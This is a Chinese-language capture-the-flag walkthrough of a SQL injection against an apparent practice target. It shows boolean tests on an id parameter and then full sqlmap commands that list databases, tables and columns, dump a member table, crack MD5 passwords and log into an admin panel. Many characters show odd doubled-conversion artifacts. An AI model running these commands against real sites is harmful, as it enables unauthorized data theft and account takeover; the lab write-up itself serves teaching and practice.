1.發(fā)現(xiàn)此網(wǎng)址可能存在sql注入漏洞，我們進行sql盲注入測試一下是否存在漏洞。

地址欄輸入and 1=1發(fā)現(xiàn)頁面正常顯示。

再次輸入and 1=2頁面出現(xiàn)錯誤，說明該頁面可能存在sql注入漏洞

2.現(xiàn)在拿出我們的kali工具，sqlmap進行注入測試。

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 --dbs

3.可以看到存在注入漏洞，掃到了5個數(shù)據(jù)庫。要獲取管理員用戶密碼，我們可以先從stormgroup注入。查看stormgroup這個數(shù)據(jù)庫存在的表單

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -tables

4.接下來查一下member中存在哪些列。

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -T member --columns

5.上一步可以看到，name,password 是不是很熟悉。ok接下來我們開始獲取這兩列的數(shù)據(jù)。

6.可以看到password是經(jīng)過md5加密，接下來我們把他解密。這里推薦給大家我自己收集的多種解密網(wǎng)址：解密網(wǎng)址大全點擊這里

7.now! 密碼已經(jīng)呈現(xiàn)在我們眼前?。。?！找到后臺地址進行登錄。

8.END 登錄成功，拿到flag，提交。Gameover ！

總結(jié)

本篇文章就到這里了，希望能給你帶來幫助，也希望您能夠多多關(guān)注本站的更多內(nèi)容！

海外服務器租用

版權(quán)聲明：本站文章來源標注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請保持原文完整并注明來源及原文鏈接。禁止復制或仿造本網(wǎng)站，禁止在非maisonbaluchon.cn所屬的服務器上建立鏡像，否則將依法追究法律責任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學習參考，不代表本站立場，如有內(nèi)容涉嫌侵權(quán)，請聯(lián)系alex-e#qq.com處理。